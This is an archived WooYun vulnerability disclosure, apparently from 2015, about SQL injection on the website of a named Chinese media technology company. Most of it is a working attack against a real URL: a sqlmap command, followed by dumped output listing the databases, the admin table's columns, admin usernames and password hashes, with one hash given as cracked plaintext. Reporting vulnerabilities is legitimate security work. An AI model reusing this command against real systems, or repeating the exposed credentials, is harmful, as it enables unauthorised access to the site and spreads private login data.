乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-22: 厂商已经主动忽略漏洞,细节向公众公开
三人行传媒网络科技股份有限公司/管理员账号密码已爆
注射sqlmap.py -u "http://www.topsrx.com/index.php?m=default&c=page&a=detail&name=Company%20Profile" --dbs
脱出数据证明危害存在
available databases [12]:[*] db_hellouniversity[*] db_topsrx[*] information_schema[*] manage[*] mysql[*] openfire[*] smartcollege[*] smartcollege_gsh[*] smartcollege_qz[*] test[*] vote[*] webmanageDatabase: db_topsrx[13 tables]+---------------+| srx_admin || srx_category || srx_file || srx_guestbook || srx_job || srx_link || srx_mod || srx_nav || srx_news || srx_page || srx_product || srx_setting || srx_show |+---------------+Database: db_topsrxTable: srx_admin[7 columns]+---------------+------------------+| Column | Type |+---------------+------------------+| id | int(3) unsigned || ipaddress | varchar(30) || lastlogintime | int(10) unsigned || logincount | int(6) unsigned || password | varchar(32) || roleid | int(1) unsigned || username | varchar(50) |+---------------+------------------+Database: db_topsrxTable: srx_admin[2 entries]+----------+| username |+----------+| admin || yuxang |+----------+Database: db_topsrxTable: srx_admin[2 entries]+----------------------------------+| password |+----------------------------------+| 36df336a9a11768d3a835c99a0c84d49 |明文:661699| e2c4496d6bcec25cca46e129b506f468 |+----------------------------------+
admin密码是661699~~老夫居然没找到后台。。。。
综上
你们懂
未能联系到厂商或者厂商积极拒绝